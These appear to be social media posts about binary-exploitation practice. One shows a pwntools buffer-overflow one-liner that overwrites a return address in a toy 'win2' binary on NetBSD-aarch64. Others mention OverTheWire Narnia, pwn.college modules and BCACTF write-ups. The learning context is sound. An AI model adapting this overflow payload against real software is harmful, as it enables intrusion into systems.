pwning NetBSD-aarch64 (ARM)
- http://www.feyrer.de/NetBSD/blog.html/nb_20260308_1932.html
#pwn #binaryexploitation #ctf #cybersecurity #pwntools #gdb #netbsd #arm #aarch64
pwning NetBSD-aarch64 (ARM)
- http://www.feyrer.de/NetBSD/blog.html/nb_20260308_1932.html
#pwn #binaryexploitation #ctf #cybersecurity #pwntools #gdb #netbsd #arm #aarch64
This afternoon's fun: pwning NetBSD-aarch64 (ARM)
(venv-pwn) qnetbsd$ python3 -c 'from pwn import * ; p = b"A" * 16 + p64(0x2001009f4); sys.stdout.buffer.write(p)' | ./win2
What is your name? Hello AAAAAAAAAAAAAAAA�
Goodbye, winner.
(venv-pwn) qnetbsd$ uname -a
NetBSD qnetbsd 11.0_RC2 NetBSD 11.0_RC2 (GENERIC64) #0: Wed Mar 4 21:02:00 UTC 2026 [email protected]:/usr/src/sys/arch/evbarm/compile/GENERIC64 evbarm
#pwn #netbsd #binaryexploitation #arm #aarch64 #pwntools #gdb #ctf
Fun with AI generating images for Over The Wire`s starter wargame for Binary Exploitation
https://overthewire.org/wargames/narnia/
#ctf #cybersecurity #OverTheWire #Narnia #BinaryExploitation #Pwn
pwn.college's Binary Exploitation module: ✅ - took less than two days in total (with a few days off in between). Now off to the remainders of the Orange belt, especially the challenge that was added to the Crypto module after I've finished that.
All the other modules for the Orange Belt are done, and now to the part that really got me into pwn.college: It's pwn time! 🙂
Baby steps, giant steps... slowly working towards my Orange belt in pwn.college. Finally completed Web Security with XSS & CSRF today, and now I only have the most interesting modules left: Reverse Engineering and Binary Exploitation (plus the combined exercise after that).
#ctf #cybersecurity #websecurity #xss #csrf #reverseengineering #binaryexploitation #pwn #pwncollege
Check out my blog posts about #binaryexploitation #pwning challenges in BCACTF 2022
https://karmanyaah.malhotra.cc/puzzles/2022/07/bcactf2/
https://karmanyaah.malhotra.cc/puzzles/2022/07/bcactf1/